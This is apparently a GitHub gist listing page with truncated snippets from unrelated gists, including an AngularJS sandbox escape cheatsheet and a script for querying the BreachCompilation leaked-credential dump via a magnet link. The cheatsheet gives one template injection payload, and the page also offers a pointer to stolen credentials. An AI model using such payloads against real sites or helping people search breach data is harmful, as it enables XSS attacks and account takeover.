#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
banksean
/ perlin-noise-classical.js
Created
February 15, 2010 10:00
two Perlin noise generators in javascript. The simplex version is about 10% faster (in Chrome at least, haven't tried other browsers)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Ported from Stefan Gustavson's java implementation | |
| // http://staffwww.itn.liu.se/~stegu/simplexnoise/simplexnoise.pdf | |
| // Read Stefan's excellent paper for details on how this code works. | |
| // | |
| // Sean McCullough banksean@gmail.com | |
| /** | |
| * You can pass in a random number generator object if you like. | |
| * It is assumed to have a random() method. | |
| */ |
3n
/ guilloche.js
Created
January 30, 2011 22:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| --- | |
| name: guilloche | |
| script: guilloche.js | |
| description: guilloche | |
| provides: [Guilloche] | |
| ... | |
| */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # On bash + Linux | |
| # Show TCP sockstats every 5 seconds | |
| $ while [ : ]; do echo -n `date`; echo -n ": "; cat /proc/net/sockstat | sed 'N;s/\n/ /;' | grep TCP; sleep 5; done | |
| # Show netstat connection state counts every 5 seconds | |
| $ while [ : ]; do echo -n `date`; echo -n ": "; netstat -n | awk '/^tcp/ {t[$NF]++}END{for(state in t){print state, t[state]} }' | tr '\n' ' '; echo ; sleep 5; done | |
| # Show top 25 established IPs and their counts | |
| $ lsof -n|grep TCP|grep ESTABLISHED|awk '{print $9}' |grep -e "->"|awk -F '->' '{print $2}'|awk -F ':' '{print $1}'|sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n|uniq -c|sort -rn|head -25 |
bryanbuchanan
/ GetShapeArea.jsx
Last active
April 1, 2024 09:32
Script to find the area of shapes in Adobe Illustrator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Save this file with a jsx extension and place in your | |
| Illustrator/Presets/en_US/Scripts folder. You can then | |
| access it from the File > Scripts menu */ | |
| var decimalPlaces = 3; | |
| if (app.documents.length > 0) { | |
| if (app.activeDocument.selection.length < 1) { | |
| alert('Select a path'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| INTRO | |
| I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute. | |
| Short Link: http://tiny.cc/awssecurity | |
| Official AWS Security Resources | |
| * Security Blog - http://blogs.aws.amazon.com/security/ | |
| * Security Advisories - http://aws.amazon.com/security/security-bulletins/ | |
| * Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf | |
| * Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf |
jeremybuis
/ angular.sandbox.escapes.md
Created
January 27, 2016 15:31
Angular Sandbox Escape Cheatsheet
dinvlad
/ get-aws-token
Created
October 25, 2016 23:32
Get session token for virtual MFA-enabled actions through AWS CLI
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Thanks to MattJ at: | |
| # http://www.brassmill.net/2015/10/using-the-aws-cli-with-roles-security-token-service-and-mfa/ | |
| # | |
| # User must have 'iam:GetUser' permission on themselves that doesn't require MFA | |
| [ -z $1 ] && echo "Please enter your MFA code" && exit 1 | |
| user=$(aws iam get-user \ |
pierrejoubert73
/ markdown-details-collapsible.md
Last active
May 2, 2024 16:19
How to add a collapsible section in markdown.
nlitsme
/ breachquery.sh
Created
December 14, 2017 08:10
query.sh for older bash versions - from magnet:?xt=urn:btih:7ffbcd8cee06aba2ce6561688cf68ce2addca0a3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # query.sh from BreachCompilation - magnet:?xt=urn:btih:7ffbcd8cee06aba2ce6561688cf68ce2addca0a3 | |
| # works with older bash versions. | |
| # patch by Willem <itsme@xs4all.nl> | |
| dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) | |
| if [ "$1" != "" ]; then | |
| word1=$(echo $1 | tr A-Z a-z) | |
| letter1=$(echo $word1|cut -b1) | |
| if [[ $letter1 == [a-zA-Z0-9] ]]; then |
lxe
/ goes16-rtlsdr.md
Last active
April 12, 2024 20:28
Receive GOES-16 and GOES-17 Images with a Raspberry Pi and RTL-SDR dongle
Also see the original Pieter Noordhuis's guide
You need:
- Raspberry Pi Model B (or B+) with a MicroSD Card $35-40
- An RTL-SDR dongle:
OlderNewer